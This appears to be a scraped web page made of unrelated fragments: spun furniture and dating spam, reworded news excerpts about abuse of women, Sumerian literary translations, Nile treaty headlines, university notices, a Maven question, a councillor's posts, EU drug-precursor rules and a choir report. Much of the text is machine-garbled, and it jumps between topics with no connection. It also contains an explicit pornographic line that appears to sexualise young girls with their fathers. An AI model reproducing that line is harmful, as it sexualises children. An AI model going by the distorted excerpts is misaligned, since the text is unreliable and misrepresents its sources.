This page appears when on the internet details safety providers detect visit this page requests coming from your Laptop or computer network which appear to be in violation of our Site's conditions of use.
Unsure just what you want however? Start off by checking out our collections down below, or use the menu on the correct to navigate our outdoor solutions.
Mix up your dwelling and eating options to get a laid-again sense or choose considered one of our matching packages – either way, you may adore your outdoor House When you've got cozy furniture to take it easy on.
Acquire selected carpet with underlay & we’ll put in it across your entire house For less than $ninety nine. Excludes consider-up, furniture removing and stairs. Readily available in retail outlet only.
The Australian local climate is ideal for outdoor entertaining and the best outdoor furniture, designed Primarily to withstand our harsh temperature, can deliver fantastic consolation and versatility to your outdoor location.
Whatsoever your outdoor location, contemplate how you would like to make use of the House, my explanation irrespective of whether It is really for just a quiet reading zone, cocktail hour or enjoyment area. All-weather rugs not merely visually softens an outdoor space, it provides this website convenience, color and it defines the region.
Sue H. Verified evaluation Arbor and Improvements have done several Work opportunities for pop over to these guys me, such as rebuilding a leaky Bay window, portray, lawn get the job done and plumbing. The Drenning brothers are professionalooking and do outstanding work. Highly recommend them for all sorts of property advancement.
Our layouts are clean up, lightweight, and ready to delight in. Be proud to important source appreciate wicker variations produced to face nearly all types of climatic conditions. Whether You will need a one outdoor wicker daybed or a whole patio dwelling set, you will find it below at Wicker Paradise.
There are many mature singles looking for a date online tonight - and we can put you in touch with them if you're looking to date a mature man or woman, we have the site for you, local mature singles.
Free classified ads for women seeking men and everything else find what you are looking for or create your own ad for free.
Find women seeking men listings on oodle classifieds join millions of people using oodle to find great personal ads don't miss what's happening in your neighborhood.
With over 6,000 products, ET2 Online®'s growth and success stems from one simple, but enduring concept— treat customers and employees like family, and never settle for less than excellence. This philosophy attracts the industry's finest designers, engineers, and manufacturers each dedicated to creating innovative lighting solutions best described as functional art.
This was the first project implemented by DEPROSC-Nepal in the field in January 1994 in Uttarganga VDC of Surkhet and Thangpal Dhhap VDC of Sindhupalchok district. The program was financially assisted by PACT Nepal.
By the end of the project in june 1994, 476 women became literate after successfully completing the course. Total 500 women had enrolled in the class.
Looking for Dequeen High School alumni not listed? If so, check out Classmates.com® - hundreds of more DHS alumni have posted their profiles.
If you attended Dequeen High and want to be added to the alumni directory register now to add your name to the alumni list.	Don't forget to upload your Dequeen High School pictures and check on the latest info about any Dequeen High School reunion.
The High School Network is not affiliated with, endorsed, or sponsored by Dequeen High School	of De Queen, Arkansas
Electronic mail me if anyone replies to my comment Note: Thoughts expressed in responses are These from the authors on your own rather than always those of Daniel Pipes. Primary composing only, please.
Palestinian terrorist prisoners smuggle out sperm: Palestinian websites declare that 6 terrorist prisoners in Israeli jails have managed, in the agency of family, to acquire their sperm to their wives, that have impregnated them selves with it, Based on Yedi'ot Aharonot.
He states that Gals typically Get hold of him on the lookout for jobs, While You will find there's Exclusive Section that promotions with Ladies applicants. "In the future, a Girl termed me on my cell. It was twelve.thirty a.m. I wondered how she bought keep of my
The prosecutor, Philip Boyd, defined: 'Mrs Bibi was Plainly exploiting Each and every of such Ladies. They were handled like young children, slaves or canines by a routine of threats of power or real drive.
Indonesia's Nationwide Police Employment Site states, as of November 5, 2014, that, "Along with the medical and physical exams, Gals who would like to be policewomen need to also bear virginity exams.
Alternatively, the police officer noticed them as ladies, dismissed their pleas and instantly sent them again for their distant village in Ghor Province.
The interviewer asks: "How did you ever dare to indicator a satisfaction-marriage deal using a 9-12 months-old girl?" and 'Aleiq replies: "In our society, so as in order to touch a animal farm lady or a woman, there have to be a agreement of enjoyment-marriage."
On top of that, if her father is deceased, she simply cannot remarry with no [her son's] blessing. She also cannot be used in several fields without presenting a signed letter of acceptance from her son.
My father defeat me and informed me which i need to marry this male, and when I didn't, I will be raped and no legislation and no sheikh in this region would aid me.
The elders mentioned The person really should not be taken towards the law enforcement, but alternatively shell out a dowry for your goat since he employed it as his wife.
Her technique of recruitment? Organizing their rape in an effort to exploit the deep shame linked to rape in Muslim Culture as a way to force the victims to forfeit their life as suicide bombers, therefore fairly redeeming their missing honor.
We urge each man and woman to help our privateness from becoming violated by men to whom we have been obliged to get our personal garments objects. It is really essentially the most irritating expertise thus far to Females.
Jassim stated. "She was mumbling verses in the Koran." "I got her towards the lender and still left her there," she went on, unemotionally. "She detonated herself in a law enforcement station in Muqdadiya."
Pashtun Adult males normally have sexual intercourse with other Guys, admire other Adult men bodily, have sexual associations with boys and shun Girls the two socially and sexually—but they completely reject the label of "homosexual." ...
Forge Media are the official broadcaster of Sheffield Varsity 2018. We'll be bringing you coverage of all the events across the sporting period - with live coverage from some of the biggest days including Hallam Sports Park, English Institute of Sport and the final at Hillsborough Stadium.
A character actor who can be seen in such major films as High Noon (1952) and The Grapes of Wrath (1940). Worked in touring theatre companies for many years before turning to films. He appeared in more than 200 films in a little over 15 years on screen. Expect to see many more of these posted here.
Right on man..!! One of the things I love the most about movies from the 30's & 40's is the fact that there were soo many amazing "character actors" !!! They were ALL of them STARS, as they were all consummate professionals having received their training on the vaudeville circuit. Consequently, they really knew their business..SHOW BUSINESS !! And, they were all soo diverse, REAL PEOPLE.., (not ludicrous, one-dimensional boors with Narcissus complexes..).Cliff Clark was all of that.., and one of my many favorites !! In movies such as; "Miracles for Sale"- '39, ( w/R.Young).., "Stranger on the Third Floor"- '40, (w/P.Lorre).., "Murder in the Air"- '40, (w/R.Reagan).., and "Nine Lives are Not Enough"- '41, (also w/R.Reagan)..., He's great in all of these..usually as a jaded, rather cynical police detective..always a joy.., always adding soo much..!!! I like your idea for this blog Ian.. I really LOVE these forgotten actors..people truly do NOT know what they are missing. I love these movies.., from the '30's & '40's especially.. !!! --Peace !!
Great blog, I love reading about all the real actors who had to remember their lines and didn't have all the modern tec to help them. I also like that back in the day movies had more than just a few actors but many character actors as well.
Blog Archive November (42) October (79) September (23) August (21) July (80) June (4) May (83) April (19) March (73) February (20) January (12) December (3) November (1) October (7) September (8) August (24) July (12) June (16) May (83) April (134) March (33) February (27) January (38) December (50) November (78) October (149) September (127) August (75) July (9) June (61) May (16) April (20) March (40) February (22) January (60) December (24) November (11) October (45) September (5) August (27) July (1) June (25) May (59) April (14) March (101) February (26) January (37) December (6) November (6) October (53) September (266) August (116) July (172) June (61) May (111) April (93) March (17) February (130) January (75) December (21) November (15) October (68) September (154) August (148) July (1) June (42) May (78) April (148) March (2) February (74) January (7) December (70) November (46) October (51) September (1) August (136)
Born: 12 October 1931, Massachusetts, USA Died: 15 May 1960, Los Angeles, California, USA Sam Buffington was a TV actor who appeared in o...
Born: 6 March 1929, Detroit, Michigan, USA Died: 5 February 1978, Michigan, USA Five Little Peppers in Trouble (1940) as Tim (uncredited...
Born: unknown Died: unknown Heather Wilde was an actress who was diminutive in stature, which was often used for comic effect. The Bank...
Born: 7 October 1924, Milwaukee, Wisconsin, USA Robert Casper was mainly a television actor who featured in many of the big shows of the 1...
Born: 1 April 1932, Halifax, Yorkshire, England, UK Carrie's War (1974) (Episode 1) as Lou Evans Doctors (2008)...
Born: 24 November 1899, Vienna, Austria-Hungary [now Austria] Died: 8 January 1988, Santa Barbara, California, USA Young Frankenstein (19...
Born: 4 April 1935, Chicago, Illinois, USA Died: 12 February 2011, Granada Hills, California, USA Young Frankenstein (1974) as Inspector...
Born: 18 October 1935, Norristown, Pennsylvania, USA Died: 12 December 2006, Manhattan, New York City, New York, USA Young Frankenstein (...
Copyright © 2018 · Foodie Theme by Shay Bocks · Built on the Genesis Framework · Powered by WordPress
This bulletin board is currently closed. The Administrator has specified the reason as to why below.
their busty and round assed mommies, where pretty small girls feel enormous huge cocks of their daddies in mouths, pussies and assholes and a lot of
Kids Patio Furniture - Through the thousand photographs on the net regarding Kids Patio Furniture , we all choices the top choices having best quality only for you, and this photographs is actually one among pictures choices within our best photographs gallery in relation to Kids Patio Furniture. I'm hoping you can enjoy it. This particular picture (Kids Patio Furniture Best Of Bedroom Ideas Outdoor Kids Chair Best Furniture Awesome) earlier mentioned is usually branded having: kids patio chairs,kids patio furniture,kids patio set,kids patio swing, posted simply by Judy Johnson in 2018-03-29 13:38:48. To find out many photos in Kids Patio Furniture photographs gallery remember to abide by this kind of website link. The Most Brilliant and Interesting Kids Patio Furniture intended for Invigorate The house Found Property|Cozy DreamHousehold
Loungemobel Outdoor Sale Kids Table and Chairs Patio Chairs for Kids from Kids Patio Furniture , source:southlandsidewalks.com
Pin by Becky Jones on Heidi picture board Pinterest from Kids Patio Furniture , source:pinterest.co.uk
Bedroom Chair Unique Bedroom Ideas Outdoor Kids Chair Best Furniture from Kids Patio Furniture , source:altroism.org
Table and Chair for toddler New Bedroom Ideas Childrens Outdoor from Kids Patio Furniture , source:asanamara.com
2-3. (cf. 6.1.09.a12-13, 6.1.19.b1-2, 6.1.21.b4-5, 6.2.5: YBC 4677 ll. 1-4) When a fattened pig is about to be slaughtered, one says "I must replace what I eat." As the piglet snuffles around, it says "I can no longer take pleasure in eating."
12-14. (cf. 6.1.19.c7, 6.1.21.c1, 6.1.23.18) A man's waterskin is his life. A man's sandals are his eyes. A man's wife is his supervisor (?). A man's son is his protective shade. A man's daughter is his eager servant (?). A man's daughter-in-law is his policeman.
15. (cf. 6.1.03.26, 6.1.19.c2) When the sun is setting outside so that you cannot see a hand in front of you, go inside!
Watch Al jazeera video on The new Nile Treaty A controversial deal has been signed to share the waters of the world’s longest river. But Egypt and Sudan are not happy at...	Read more »
* Kenya says will sign as soon as possible * Egypt says agreement lacks legitimacy By Elias Biryabarema ENTEBBE, Uganda, May 14 (Reuters) – Four east African countries signed a new deal...	Read more »
ADDIS ABABA (Reuters) – Ethiopia opened a dam on Friday that it says will produce 460 megawatts (MW) of hydropower as part of efforts to overcome chronic energy shortages and become a...	Read more »
Four East African states have signed an agreement to seek more water from the River Nile – a move strongly opposed by Egypt and Sudan. Under a 1929 accord, some 90% of...	Read more »
CAIRO — Egypt is refusing to relinquish a drop of its legal right to the lion’s share of Nile river water, despite demands from other African countries for a more equitable sharing...	Read more »
– Egypt and Sudan Object The Treaty – “Any Treaty without Egypt and Sudan is mean the death of the Nile Basin initiative.” Egypt Ethiopia says seven African nations will sign an...	Read more »
By Jason McLure April 20 (Bloomberg) — Ethiopia accused Egypt of stalling talks aimed at reaching an accord over sharing water from the Nile River. “Egypt has employed a delaying tactic which...	Read more »
by Desalegn Sisay, Djamel Egypt’s fight to hold on to its monopoly over the Nile’s water resource has split the Nile dependent countries into two groups with Sudan supporting the north African...	Read more »
Egyptian Foreign Minister Sameh Shukry has met South Sudanese President Salva Kiir to discuss Juba’s request to join the Cairo-based Arab League, according to a foreign ministry statement.
The meeting comes in the wake of a brief Africa tour by Shukry, during which he met Kiir in the South Sudanese capital on Monday.
The candidates can file their objections regarding discrepancy and accuracy of the answers by email at pbbedadmissions@pu.ac.in, by August 10, 2017 up to 4:00 p.m.
121 24/07/2017 ADDITION in the date sheet of MBA(Executive/Off Campus) Examination being held in July-2017
133 18/07/2017 ADDITION & CHANGE in the date sheet of B.E./B.E.(MBA) 3rd , 5th & 9th SEMESTER (Reappear)
177 26/05/2017 Addition in the date-sheet of Bachelor of Education (B.Ed.)-2nd Semester (Regular/Reappear) (May-2017)
178 26/05/2017 Addition in the date-sheet of M. Sc. (IT)-2nd Semester (OLD SYLLABUS) Examination (May-2017)
181 24/05/2017 Addition in date sheet of B.Ed.-Special Education (Lerarning Disability)-2nd Semester (Reappear)
187 19/05/2017 CHANGE in timings of B.A/BCom. LL.B. (Hons.) (Five Year Integrated Course) 2nd, 4th, 6th, 8th & 10th Semesters (Regular/Reappear)
190 12/05/2017 CHANGE in the date sheet of B.A./B.Sc B.Ed.-2nd Semester (Regular/Reappear)Examination (May-2017)
197 06/05/2017 Addition/Change in the date-sheet B.Sc.(Hons)Bioinformatics/ Biotechnology 2nd & 6th Semester
233 10/04/2017 Syllabus for Golden Chance of all Professional Courses UG PG Courses (Annual System) May June 2017
235 31/03/2017 Grant of Golden Chance to the Students of all Professional Courses UG PG Courses (Semester System Odd & Even) Examinations only in May 2017
241 01/03/2017 Un-Revised Examination Fee to be charged from the candidates having income between 2.5 to 5 Lac per anum
242 28/02/2017 Grant of Golden Chance to the students of all Professional Courses in May 2017, and Undergraduate/Postgraduate Courses (Annual System) in June 2017.
Countries: Brasil | Spain | Italy | England | Portugal | Scotland | Eire | Latvia | Norway | USA | Argentina | Russia | France | Belgium | Greece | Morocco | SanMarino | Croatia | Lithuania | CzechRepublic | England | Italy
1-11. An lifted his head in pride and brought forth a good day. He laid plans for …… and spread the population wide. Enlil set his foot upon the earth like a great bull. Enlil, the king of all lands, set his mind to increasing the good day of abundance, to making the …… night resplendent in celebration, to making flax grow, to making barley proliferate, to guaranteeing the spring floods at the quay, to making …… lengthen (?) their days in abundance, to making Summer close the sluices of heaven, and to making Winter guarantee plentiful water at the quay.
12-18. He copulated with the great hills, he gave the mountain its share. He filled its womb with Summer and Winter, the plenitude and life of the Land. As Enlil copulated with the earth, there was a roar like a bull's. The hill spent the day at that place and at night she opened her loins. She bore Summer and Winter as smoothly as fine oil. He fed them pure plants on the terraces of the hills like great bulls. He nourished them in the pastures of the hills.
19-25. Enlil set about determining the destinies of Summer and Winter. For Summer founding towns and villages, bringing in harvests of plenitude for the Great Mountain Enlil, sending labourers out to the large arable tracts, and working the fields with oxen; for Winter plenitude, the spring floods, the abundance and life of the Land, placing grain in the fields and fruitful acres, and gathering in everything -- Enlil determined these as the destinies of Summer and Winter.
26-32. By hand Winter guided the spring floods, the abundance and life of the Land, down from the edge of the hills. He set his foot upon the Tigris and Euphrates like a big bull and released them into the fields and fruitful acres of Enlil. He shaped lagoons in the sea. He let fish and birds together come into existence by the sea. He surrounded all the reedbeds with mature reeds, reed shoots and …… reeds.
45-49. Holy Winter ……. The ox …… its head in the yoke. Ninurta, Enlil's son, …… the fruitful acres. He …… grain in the large arable tracts. He fills the fields and fruitful acres of Enlil.
50-60. Winter made the ewe give birth to the lamb, he gave the kid to the goat. He made cows teem together with their calves, he provided butter and milk. On the high plain he made the deer and stag glad of heart. He made the birds of heaven set their nests in the broad spaces. The fish of the lagoons laid eggs in the reedbed. In all the orchards he made honey and wine drip (?) to the ground. He made the trees, wherever planted, bear fruit. He established gardens and provided plants. He made grain abundant in the furrows. He made Ezina appear radiant as a beautiful maiden. The harvest, the great festival of Enlil, rose heavenward.
61-68. Summer founded houses and farmsteads, he made the cattle-pens and sheepfolds wide. He brought great attractiveness to the broad arable tracts. At their edges he made …… flax …… ripen (?). He brought a plentiful harvest into the temples, he heaped up piles of grain. He founded towns and villages, he built the houses of the Land. He made the houses of the gods grow like the hills in a pure place. In E-namtila, the holy seat of kingship, fit for high daises, he established abundance for the Great Mountain Enlil.
69-88. Summer, the heroic son of Enlil, decided to bring offerings to E-namtila, the house of Enlil. He brought animals, cattle and sheep of the hill, fully grown wild rams, deer and stags, …… sheep, long-fleeced barley-fed sheep, thick-tailed sheep. Pigs grown fat in the midst of the reedbeds, porcupine, tortoise, turtle, birds brooding in their nests, taken together with their eggs, harvest crops, flour and malt for mixing, butter and milk from cattle-pen and sheepfold, wheat, hulled barley, small beans and large beans gathered in piled-high baskets, onions …… in their furrows, zaḫadin onions and shallots, seed turnips, cardamom (?), ……,
89-104. Winter, lordly son of Enlil, ……, released the water of life and …… opened. He gathered the …… oxen and …… the oxen. The disputed sheep was provided, barley-fed but with a scorpion at its side. Quartz, gold and silver found in leather pouches, cedar, cypress, ……, boxwood, ……, …… tribute of the Land, figs from Mari, ……, strings of dried fruit, cool water, the tribute of the hills, …… thick honey, dida beer, ……, village ……, bibra birds, esig birds, …… birds, clipped geeese, fattened ducks, carp, …… which Winter made grow up, large pomegranates gathered from the orchards, big bunches of grapes on high, winter cucumbers, …… empty ……, brought forth …… in the early rain, large turnips, large …… cut down with the knife (?), long leeks -- Winter himself brought the tribute he had collected.
105-111. Summer and Winter set about organising the animals and offerings for E-namtila, the house of Enlil. The two of them, like huge butting bulls, reared themselves triumphantly. But Winter, because his limbs had grown tired from the grain grown heavy in the furrows, and the wheat and the emmer which he had been watering by hand, turned away as from an enemy and would not draw near.
112-120. Consequently Winter was overcome by anger and he started a quarrel with Summer: "Summer, my brother, you should not praise yourself; whatever harvest produce you bring as gifts to the palace has not been made by your toil: you should not brag. As if you were the one who had done the hard work, as if you had done the farming, as if you had taken care of irrigation control during the spring floods, as if you had brought forth the …… grain in the arable tracts with the dew from heaven -- how much through my toil is it that you enter the palace!"
144-152. "After you have threshed it at your threshing floor, and have …… the cattle's dung, your carrying-nets are to hand, …… bearing your straw. …… the animals, the storehouses and their contents. After your houses and farmsteads …… sheep, …… from your cattle, after …… their reedbeds, after …… green briars and cut …… thorns, …… storehouse …… the dung of unyoked oxen -- the slave Summer, the duly-appointed labourer who will never rest from his toil, a hired man who has to return to the fields of the Land for his own sustenance!"
153-156. On that day Winter taunted Summer. Summer, the hero whom one does not challenge, searched for rude insults. He was confident in himself, considering the harvest time, and turned aside. Like a great bull eating rich grass, he raised his head.
157-163. Next, Summer replied to Winter: "Winter, you may have to stay by the side of the oven, ……; but you should not launch such serious insults against someone who does not lead a sedentary (?) life. …… for the work of tilling the Land, with its difficulties, you do not raise a cry in the gune (?) cult centre, you do not look after the house. The young scribe is neglectful, which is an abomination, and no rushes are plucked for the beds. The singer does not embellish the banquet, …… at its side."
164-171. "Winter, don't launch such insults! …… to the desert. I will make the strength of my power come forth in the house so that you recognise it. In my working term of duty, which is seven months of the year, …… does not speak softly.
172-184. "After they …… my seed, Winter, do not …… noise, when water is cut off from the arable tracts, when the bowls lie placed, when the fishing place has been prepared, when the fish have been piled up, I am Father Enlil's great comptroller. I harrow the fields into fruitful acres. When the oxen have stopped working the fields, when you have concentrated your efforts on the damp areas and given the sign for the field work, I do not work for you in the large arable tracts and fruitful acres early in the season. If the spring grain bends its neck in the hollow of the furrows, no one provides a fence. Whatever your farmer brings to the oxen, he will not make the oxen angry with me. Winter …… in the uplands ……. The man of the bedroom ……."
189-199. Thereupon Winter replied to Summer: "Summer, the donkey grazing on grass at the harvest ground and braying noisily, the mule ……, the harvest ox chafing its neck in the pegs and tossing its head in the lead rope, the innkeeper going to the harvest ground carrying a bowl in his hands, the flour …… playing ……, the bragging fieldworker who does not know the extent of the field -- Summer, my brother, after you have gone out boasting about my toil, when at the turn of the year grain is brought into the houses and the granaries are packed full, when you bring the surplus, your bardul garment and your niglam garment are ……. When some one gives a two mana axe to you, you go off to your steppe."
When tribute is brought in your freight boats ……. When the grass has arrived in the storehouse, …… before me. What will the penned sheep eat? Your …… reeds are exhausted. The reed-cutter who sets about pruning with the sickle and splitting older reeds, the builder who places labourers in houses, never resting from his efforts, the potter who digs out clay, lights a fire and stokes it with wood …… the pot! Weaver, weave your bardul garment with the strength (?) of your aktum cloth. Brewer, bake your beer bread at the harvest ground as your assignment! Cook, produce great banquet loaves in summer! The building supervisor …… the …… of the roofs. People …… boots and shoes ……."
216-224. "Summer, my brother, as long as you go with my term of duty, great and small order you about and your string is not cut. Although you have gathered all things in the Land and filled the storehouses, in all my strength I am their owner when your limbs become tired. When the clouds have brought down the abundance of heaven, and the water of the first greening has descended from the hills, and the new grain has been put in the granary to be added to the old grain, the good farmer, having seen to his fields, shouts for joy, the carrier donkeys stand ready and he sets out confidently for the city."
225-235. "My brother, when you have put the holy plough away in the barn, the storehouse, everything you have gathered, you make a roar like fire. You sit down to plentiful food and drink. You obtain the choicest goods from the Land. For my king named by Nanna, the son of Enlil, Ibbi-Suen, when he is arrayed in the šutur garment and the ḫursaĝ garment, when you have taken care of the bardul garment and the niĝlam garment, when you have made a perfect feast for the gods, when the Anuna have placed garments on their holy bodies, in his E-namtila, the holy abode of kingship founded by An, at that place of content they prepare a choice banquet."
236-247. "When the šem and ala drums, …… and other instruments play together for him, he passes the time with your heart-gladdening tigi and zamzam instruments. But it is I who have made the wine plentiful and made much to eat and drink. I perfect the garments with fine oil. I bring up the ……, the šutur and aktum garments. As for safeguarding, the best in Sumer, in the oppressive heat (?) of Summer, where they had been put away in the bedrooms amongst the black-headed people, moths destroy the blankets and make the aktum cloth perish because of you. …… exhausts itself for you ……. The wooden chest ……. I am Ninkasi's help, for her I sweeten the beer, with as much cold water, the tribute of the hills, as you brought."
248-258. "After …… pots, after …… pots, after the plump grapes have been laid out in the cool breeze, I make my king's great palace …… pleasant. I am the one who cools down my king. I fill the fish-hook. My comrade, grasp your leather bag, go out ……. The farmer …… hardship. The farmer …… the rain. The gardener does not know how to plant purslane, your …… basket ……. How can you compare yourself to me while seeking a roof under which to rest?"
259-263. For a second time Winter had taunted Summer. Summer, the heroic son of Enlil, was convinced of his own strong power and consequently trusted in himself. He acted as if in a friendly manner to the insults that Winter had spoken to him.
264-273. Then Summer replied to Winter: "Winter, you should not be so self-important about your superior strength after you have explained the grounds for your bragging. I shall speak about your abode in the city which I shall ……. You seem like a man of office but you are an inept one. Your nets are for the oven-side, hearth and kiln. Like a herdsman or shepherd encumbered by sheep and lambs, helpless people run like sheep from oven-side to kiln, and from kiln to oven-side, in the face of you (?). In sunshine …… you reach decisions, but now in the city people chomp and chew because of you."
274-282. "When the day is half done, nobody walks about in the streets. The servant, basking by the side of the oven, is in the house until sunset. The maid, not attending to the flow of the water-container, passes the day on garments. As for the fields not worked in winter, their furrows are not cut straight and their grain, having not been cast into a wholesome place, is taken away by huge flocks of rooks. The vegetable cutter …… does not …… those vegetables at the market. Carrying old reeds, the labourer is halt and lame. Don't speak with a gaping mouth of your superior strength -- I will make known its shape and essence."
283-287. For a second time Summer had taunted Winter. On that day of the E-kur's festival and Sumer's plenty, the two of them stretched (?) their legs and stood combatively. Summer and Winter, like great bulls about to tear at each other's horns, bent forward like wild bulls in the main courtyard and took up their positions.
288-296. Like a great bull Winter raised his head to speak: "Father Enlil, you gave me control of irrigation; you brought plentiful water. I made one meadow adjacent to another and I heaped high the granaries. The grain became thick in the furrows. Ezina came forth in splendour like a beautiful maiden. Summer, a bragging field-administrator who does not know the extent of the field, …… my thighs grown tired from toil. …… tribute has been produced for the king's palace. Winter admires the heart of your …… in words."
297-303. Summer pondered everything in his head and calmed down. Summer spoke respectfully to Enlil: "Enlil, your verdict is highly valued, your holy word is an exalted word. The verdict you pronounce is one which cannot be altered -- who can change it? There was quarrelling of brother with brother but now there is harmony. For as long as you are occupying the palace, the people will express awe. While you live there, far be it from me to mock -- in fact I shall praise you."
304-309. Enlil answered Summer and Winter: "Winter is controller of the life-giving waters of all the lands -- the farmer of the gods produces everything. Summer, my son, how can you compare yourself to your brother Winter?" The import of the exalted word Enlil speaks is artfully wrought, the verdict he pronounces is one which cannot be altered -- who can change it?
310-315. Summer bowed to Winter and offered him a prayer. In his house he prepared emmer-beer and wine. At its side they spend the day at a succulent banquet. Summer presents Winter with gold, silver and lapis lazuli. They pour out brotherhood and friendship like best oil. By bringing sweet words to the quarrel (?) they have achieved harmony with each other.
316-318. In the dispute between Summer and Winter, Winter, the faithful farmer of Enlil, was superior to Summer -- praise be to the Great Mountain, Father Enlil!
gray and white pillows a black white and gray throw pillow cover gray and white striped pillow cover.
I'm using the latest version of the maven plugin (1.5.5) and can't get the "outputFile" option to work in terms of changing the name of the generated PDF file. Any help would be appreciated.
In the example below I am trying to get the file to be called XXXXXX.pdf, but it refuses to be called anything other than swagger.pdf!
The `outputFile` options is for 1.5.6 and has not been released yet. I hope to have some time during next week to implement this (https://github.com/asciidoctor/asciidoctor-maven-plugin/issues/303) and release. In the meantime you'll have to plug another maven plugin to do the renaming.
Yes, as you correctly say I use 3 x maven plugins to take my Swagger annotated classes and produce an HTML and PDF representation from them.
Build a vital cultural and economic hub for the entire city while improving the lives of those in need
Broad community strategies and partnerships to create pathways to health, success, and well-being for those with the least
Improve democratic engagement and community connection by hosting regular community meetings with residents
Get ahead of coming provincial requirements, removing barriers and making the city more accessible for all
Foster growth in the sector to make our city a true creative and cultural hub to benefit both residents and visitors
Reconsider current growth model and look to models that maintain and improve the health of existing neighbourhoods and responsibly build new neighbourhoods
Where workers are respected, people aren’t left behind, and we address the widening inequality gap in society
One week ago, I had the privilege of being elected by Oshawa voters in Ward 4 to represent them at City Council, and I can't tell you how much I look forward to working together. One thing I'd highly encourage you all to do (wherever you live in Oshawa) is fill out this survey: your feedback helps city staff improve the electoral process for municipal elections. There's also a question on there about online voting. It only takes a minute!
Hey everyone - we think we've got the signs cleaned up, but if you see that we've missed any or if you still have one at home, email us at campaign@derekgiberson.ca or send a message to the page with details and we'll make sure they get picked up! ...
Thank you so much everyone: the words and messages of support, the time and energy you contributed to helping this campaign, and of course the residents of Ward 4 in Oshawa who have put their confidence in me to represent them for the next four years.
My regards to the other candidates who ran good, clean campaigns based on a desire for a better Oshawa. It's a huge sacrifice putting your name and time out there and you deserve respect for doing it.
My phone was going off non-stop last night before finally the battery died but I will get back to everyone's messages as soon as I can! Again - my deepest thanks. I'm looking forward to these coming four years and the honour of serving and working for this city and community of people.
One hour to polls closing, and one hour to our end-of-campaign party - we moved the time back just a bit, come for 8! But don't late, results come in fast - Oshawa uses tabulators so we'll be announcing results as early as 8:30, 9 at the latest! ...
If you're unsure of your poll location, this page on the City Of Oshawa's website makes it easy - just punch in your address and you'll know where to go vote. Bring photo ID and proof of address, and your yellow voter card if you received it. If you didn't, no problem - they can register you on the spot with ID and proof of address. ...
Our investment in renewable energies has a very specific objective: generate economically and ecologically viable power and make the energy transition a genuine and sustainable reality in France. Today, our figures speak for themselves.
Purchase of energy at fixed and/or indexed prices to seize market opportunities and secure market revenues
In January 2016, the support mechanism for some renewable energy sources was reformed. A new support scheme has been created in addition to the opening up of the Feed-in-tariff system.
Green electricity is sold directly on the market. The support takes the form of a premium, the « Complément de Rémunération », which is added to the revenue generated by selling electricity on the market.
Because the world is changing and with it our energies, ENGIE will invest more than ever in collaboration to lead the energy transition.
Your Daewoo Leganza engine control system detects a problem, the computer stores the diagnostic trouble code C3968 in its memory. To figure out what is wrong with your vehicle you must first extract the C3968 DTC For Daewoo Leganza.
Do you have fresh, clean fuel in the tank? If it's empty, fill it up and go! If it's full, check C3968 Daewoo Leganza that the fuel shut-off valve is open and that it is clean. Stale fuel, dirt and debris are the most common cause of outdoor power equipment not starting properly. If you store equipment with untreated gas in the tank, it can lead to engine damage.
The original multi-displacement system turned off opposite pairs of cylinders, allowing the engine to have three different configurations and displacements. C3968 Daewoo Leganza code had an elaborate diagnostics procedure, including showing engine trouble codes on the air conditionning display. However, the system was troublesome, misunderstood by customers, and a rash of unpredictable failures led to the technology being quickly retired.
The help system "ALLO" contains the information on overwhelming majority of really working companies and the organizations of Perm and the Perm edge in the database. We constantly collect the data from firms about their goods, services and contacts and we watch an urgency of this information. We hope that you will find in our products the companies interesting you, the goods and services. Yours faithfully, collective Izdateltsva NjuToN in Perm.
Former Minister Basil Rajapaksa was admitted to the Colombo National Hospital (CNH) for a medical check-up, this afternoon, a spokesman of the Department of Prisons said.
Rajapaksa was remanded by the Colombo Fort Magistrate, yesterday, in connection with an investigation carried out by the Financial Crimes Investigations Division (FCID) of the Police.
A new legal arsenal has been put in place in the EU with the entry into force in August 2005 of a set of three regulations aiming at closely monitoring trade in drug precursors both within the EU and between the EU and the rest of the world.
One regulation (Council Regulation (EC) No 111/2005, EU Official Journal L 22 of 26/01/2005) lays down rules for the monitoring of trade in drug precursors between the EU and countries outside the Union. It requires that all imports - including transhipment, exports and intermediary activities involving drug precursors be documented by operators, and that precursors be clearly identified as such. In addition, businesses trading in precursors have to hold a licence or be registered.
The third regulation (Commission Regulation (EC) No 1277/2005, EU Official Journal L 202 of 03/08/2005) lays down detailed implementing rules for the two regulations mentioned above, in order to establish the necessary procedures regarding licensing, and further detailed rules concerning the monitoring of trade. Imports and exports require prior individual authorisations where specific forms must be used. For transhipment consignments the operator must be able to demonstrate the licit purposes of the transaction. This can be done by using this model. In his regulation in annex IV, You can find the list of countries referred to in Article 20 and 22.
Different types of administrations are involved in drug precursor control, notably Health, Police, and Customs. Today, precursor specific controls through Customs at the EU external frontier are more important than ever. When the EU precursor legislation came into force more than a decade ago, the EU used to be an exporter of drug precursors. Today this is still the case, but the EU also imports drug precursors. Especially those precursors than can be misused in the illicit manufacture of Amphetamine type Stimulants (ATS) are generally not produced locally and must be brought into the EU. This situation requires particular attention from EU Customs when securing the EU external frontier.
On Thursday, (17/12/2015), Swara Wadhana Choir of Yogyakarta State University (YSU) organized Grand Closing Concert Symphony of Swara Wadhana with the theme “Our Melody Tales”. Held in YSU Auditorium, the concert was end-year concert of 2015 stewardship that told their journey and story in 2015. Swara Wadhana (“SW”) choir showcased Mixed Choir and Indonesian ethnic songs serenaded with piano. The rehearsal run for 3 months. Attending the concert were YSU Vice Rector III, Vice Rector IV, lecturers, and audience from several neighboring universities, namely Gadjah Mada University, Islamic University of Indonesia, and also Diponegoro University from Semarang. The event run gloriously as the cheering, laugh, and applause fulfilled the auditorium.
A month before, “SW” was involved in 7th A Voyage of Songs, International Choral Festival, a grandeur, Asia – Pacific scaled agenda organized by Konzert and Fortune Travels from Singapore. Taking place in Penang, Malaysia on 26—29 November 2015, YSU mandated 41 delegates comprising singers, conductors, and crew. It is reported that 5 countries in Asia – Pacific joined the event, that is, Philippines, Malaysia, Singapore, Korea, and Indonesia.
Of 10 categories, “SW” joined 2 of them, namely Mixed Voice Category and Folklore Category. At the end of the event, “SW” secured its position by making some astonishing achievements, such as Gold C in Mixed Voice Choir Category, Gold C in Folklore Category, Top 7 Grand Champion, and most importantly, Winner in Mixed Voice Choir Category.
After the competition, “SW” proceeded their agenda by having Culture Concert Tour “Anggayuh Aruming Nuswantara” which philosophical foundation is to reach dream while promoting Indonesia in the international eyes. The event was to facilitate cultural exchange of both parties, as seen from the design of the event by combining dances performed by students of Universiti Sains Malaysia (USM) and “SW” choir, YSU.
